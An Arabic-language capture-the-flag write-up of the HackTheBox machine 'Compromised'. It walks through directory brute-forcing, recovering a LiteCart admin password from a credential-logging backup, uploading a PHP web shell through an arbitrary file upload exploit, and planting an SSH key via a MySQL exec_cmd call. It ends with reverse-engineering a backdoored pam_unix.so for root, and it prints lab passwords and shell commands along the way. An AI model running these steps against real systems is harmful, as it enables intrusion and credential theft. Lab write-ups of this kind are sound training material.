#hacktbebox comp
Sammmry :
اثناء recon نجد بعد عملية التخمين على directory backup نقوم بتحميله والبحث داخله نجد بعد ذلكurl
litecart يقودنا الى كلمة السر الخاصة ب
نتسغل litecart للحصول على user بعد ذلك نجد pam_unix.so
لنجد كلمة مرور ghidra نقوم بالبحث داخله باستعمال
root
- sammmry
- 1 Recon
- 1.1 nmap
- 2 dirb
- 2.1 backup
- 2.2 creeds
- 3 Litecart
- 3.1 Arbitrary File Upload
- 3.2 Got shell
- 4 user
- 4.1 Ssh connect
- 4.2 User.txt
- 5 Privilege Escalation
- 5.1 pam_unix.so
- 5.2 ghidra
1 Recon
1.1 nmap
nmap نبدا بفحص البورتات باستخدام
## 2 dirb
dirb باستخدام directory brute force نقوم بعمل
1
Dirb http://10.10.10.207/
نقوم بفتحه backup نجد مجلد
2.1 backup
نقوم بفكهtar.gz نجد بداخل المجلد ملف
### 2.2 creeds
login.php بالبحث داخل المجلد نجد داخل
1
2
3
//file_put_contents("./.log2301c9430d8593ae.txt",
"User: ". $_POST['username']. " Passwd: ". $_POST
['password;)]'
نقوم باستعراض الملف
http://10.10.10.207/shop/admin/.log2301c9430d93ae.txt
نجد داخله كلمة سر
3 Litecart
Admin theNextGenSt0r3!~
litecart نجرب تسجيل الدخول في
تم الدخول بنجاح
Arbitrary File بعد البحث في جوجل نجد ان التطبيق مصاب ب Upload
3.1 Arbitrary File Upload
نقوم بتحميل
PHP 7.0-7.3 disable_functions bypass PoC
من هنا
https://www.exploit-db.com/exploits/47462
على السيرفر shell نقوم برفع
الى content-type :application/x-php ثم تغير
content-type :application/xml
3.2 Got shell
نتوجه الى shell تم رفع
http://10.10.10.207/shop/vqmod/xml/sl.php?c=ls
/etc/passwdنقوم بعرض
/bin/bash/shell يستخدم mysql نجد
بعد البحث في جوجل نجد طريقة الاستغلال
ssh-keygen نقوم بتوليد
server الخاص ب ssh authorized key ثم نحقنه في
1
2
mysql -u root -pchangethis -e "select exec_cmd('echo your key >
/.ssh/authorized_keys')"
الان نتصل بالسيرفرباستخدم الامر
ssh –i key mysql@10.10.10.207
4.1 Ssh connect
4.2 User.txt
نجد كلمة سر mysql بالبحث داخل الملفات الموجودة في
NLJE32I$Fe*3
5 Privilege Escalation
5.1 pam_unix.so
sysadminنستخدمها لدخول ب بالبحث داخل السيرفر
1
find / -newermt "2020-07-1"! -newermt "2020-09-1" -type f 2>/dev/null
نجد ملف باسم
/lib/x86_64-linux-gnu/security/pam_unix.so
نقوم بتحميله ونستخدم هندسة عكسية على هذا الملف حتى نجد كلمة سر نستخدمها للحصول على
root
scpننقل الملف ب
5.2 ghidra
نجد كلمة السر ghidra نفتح البرنامج